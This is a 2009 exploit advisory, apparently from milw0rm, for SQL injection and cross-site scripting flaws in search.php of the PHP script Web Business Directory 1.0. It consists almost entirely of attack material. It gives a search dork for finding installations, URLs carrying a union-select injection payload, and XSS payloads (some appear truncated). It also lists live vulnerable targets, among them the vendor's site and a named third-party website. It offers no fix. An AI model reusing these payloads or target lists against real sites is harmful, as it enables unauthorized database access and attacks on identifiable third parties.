============================================================================== [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!] ============================================================================== [»] Web Business Directory 1.0 (search.php) Multiple Remote Vulnerabilities ============================================================================== [»] Script: [ Web Business Directory 1.0 ] [»] Language: [ PHP ] [»] Download: [ http://www.phpdirectorysource.com/ ] [»] Founder: [ Moudi ] [»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...] [»] Team: [ EvilWay ] [»] Dork: [ Copyright 2005-2006 phpDirectorySource™, all rights reserved ] [»] Price: [ $75.00 ] [»] Site : [ https://security-shell.ws/forum.php ] ########################################################################### ===[ Exploit SQL INJECTION + LIVE : vulnerability ]=== [»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st= [»] http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&st=XX' union select version()/* [»] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st=XX' union select version()/* ===[ Exploit XSS + LIVE : vulnerability ]=== [»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st= [»] http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&st="> [»] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st="> Author: Moudi ########################################################################### # milw0rm.com [2009-07-21]